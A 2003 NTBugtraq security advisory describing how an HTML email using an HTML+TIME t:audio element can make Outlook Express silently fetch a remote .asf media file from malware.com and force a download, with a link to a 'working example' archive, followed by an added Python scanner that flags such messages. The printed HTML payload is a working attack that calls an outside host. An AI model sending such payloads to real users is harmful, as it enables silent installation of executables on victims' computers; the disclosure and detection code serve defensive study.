Restricted Zone: the OUTLOOK EXPRESS
http-equiv_at_excite.com
Date: 05/21/03
Date: Wed, 21 May 2003 11:55:34 -0000 To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Tuesday, 20 May, 2003
Silent delivery and installation of an executable on a target
computer. No client input other than opening an email or newsgroup
post.
This can be achieved with the default setting of Outlook Express:
RESTRICTED ZONE.
Technically the following never worked, cannot work, shouldn't work.
But it does:
MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03 http://www..malware.com
<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio t:src="http://www.malware.com/freek.asf" />
</body></html>
What that does is invoke our freakish media file including our trusty
and battle-hardened 0s URL flip from within the html of an email or
newsgroup post on viewing, which ordinarily could never be done.
But it now appears that while custom-crafted media files fail,
modified third-party files [whatever that means] function according
to plan. Specifically audio + *.asf. Our 0s URL flip points to our
file on the remote server and automatically forces our download as
instructed. Couple that with the most recent flood-like functionality
of the iframe: http://www.securityfocus.com/archive/1/321662 and
that's the end of that.
Tested on:
Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails]
First Step Working Example:
http://www.malware.com/but.its.free.zip
Notes:
1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora
WebBrowser Control Embedded Media Player File Vulnerability':
http://www.securityfocus.com/bid/4343 which appears to never have
been patched.
2. disable scripting in the media player [if it helps]
3. do not be lured into opening email and newsgroup posts from
untrustworthy sources
End Call
-- http://www.malware.com
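
A mail-gateway style check for the message shape shown in the post, as an added example that is not part of the original post: it flags HTML parts that enable the HTML+TIME behavior and point a namespaced media element at a remote URL. The function name, the element list and both sample messages (with example.invalid hosts) are constructed for illustration.

```python
import re
from email import message_from_string

# HTML+TIME is enabled through the CSS behavior "#default#time".
TIME_BEHAVIOR = re.compile(r"behavior\s*:\s*url\(\s*['\"]?#default#time", re.I)
# Namespaced HTML+TIME media element (e.g. <t:audio>) whose src is a remote URL.
# Regex matching is a heuristic; CSS escapes or odd quoting need a real parser.
REMOTE_MEDIA = re.compile(
    r"<\s*[\w-]+:(?:audio|video|media|animation|img|ref)\b[^>]*?"
    r"\bsrc\s*=\s*['\"]?\s*((?:https?|mms|rtsp)://[^'\"\s>]+)", re.I)

def scan_message(raw):
    """Return one list of remote media URLs per HTML part that enables HTML+TIME."""
    hits = []
    for part in message_from_string(raw).walk():
        if part.get_content_type() != "text/html":
            continue
        body = part.get_payload(decode=True) or b""  # undoes base64 / quoted-printable
        try:
            html = body.decode(part.get_content_charset() or "latin-1", "replace")
        except LookupError:  # unknown charset label in the message
            html = body.decode("latin-1")
        urls = REMOTE_MEDIA.findall(html)
        if TIME_BEHAVIOR.search(html) and urls:
            hits.append(urls)
    return hits

# Constructed sample: same structure as the posted message, placeholder host.
SAMPLE_FLAGGED = """\
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 7bit

<html xmlns:t><head><style>
t\\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio t:src="http://media.example.invalid/clip.asf" />
</body></html>
"""

# Constructed sample: ordinary HTML mail with a plain remote image.
SAMPLE_BENIGN = """\
MIME-Version: 1.0
Content-Type: text/html

<html><body><img src="http://www.example.invalid/logo.gif"><p>hello</p></body></html>
"""

if __name__ == "__main__":
    print(scan_message(SAMPLE_FLAGGED), scan_message(SAMPLE_BENIGN))
```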